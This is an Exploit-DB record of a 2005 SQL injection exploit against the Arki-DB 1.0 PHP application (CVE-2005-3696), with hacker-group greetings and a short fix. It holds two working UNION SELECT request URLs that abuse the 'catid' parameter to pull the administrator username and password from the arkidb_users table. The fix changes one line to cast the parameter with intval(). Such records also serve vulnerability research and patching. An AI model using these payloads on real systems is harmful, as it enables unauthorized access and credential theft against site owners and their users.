Arki-DB 1.0 - 'catid' SQL Injection
Author: Devil-00
type: webapps
platform: php
port:
date_added: 2005-11-13
date_updated: 2016-06-13
verified: 1
codes: OSVDB-20944;CVE-2005-3696
tags:
aliases:
screenshot_url:
application_url: http://www.exploit-db.comarkidb-10.zip
[~] ArkiDB SQL Injection's [~]
[~] ArkiDB (catid) Ramote SQL Injection's
[~] ---------------------- [~]
[~] Bug By Devil-00
[~] devil-00@s4a.cc
[~]
[~] Whe Ar All Love Security4Arab For Ever [ S4a.cc ]
[~] -------------------------------------------------
[~]
[~] Explorer Exploit By Devil-00
[~] -------------------------------------------------
[~] Greetz :-
[~] Devil-00
[~] www.s4a.cc << We Love You
[~] www.securitygurus.net << Love you 2 :P
[~] HACKERS PAL - ABDUCTER - Xion - Yes2Hack - Ja7ole - Magode .. All S4a And SG Members
[~]---------------------------------------------------------------------------------------------------------
[~] Explorer Exploit :-
[~]
[~] [Username]
[~] /index.php?action=view&view=category&catid=-1%20UNION%20SELECT%20null,null,username,null,null,null,null,null%20FROM%20arkidb_users%20WHERE%20id=1&catflag=1&sublevel=1
[~]
[~] [Password]
[~] /index.php?action=view&view=category&catid=-1%20UNION%20SELECT%20null,null,userpass,null,null,null,null,null%20FROM%20arkidb_users%20WHERE%20id=1&catflag=1&sublevel=1
[~]----------------------------------------------------------------------------------------------------------
[~] FIX :-
[~] Line 75 .. File /source/view.php
[~]
[~] $catid = $this->get('catid');
[~] Change To
[~] $catid = intval($this->get('catid'));
[~]----------------------------------------------------------------------------------------------------------
[~] milw0rm.com [2005-11-14]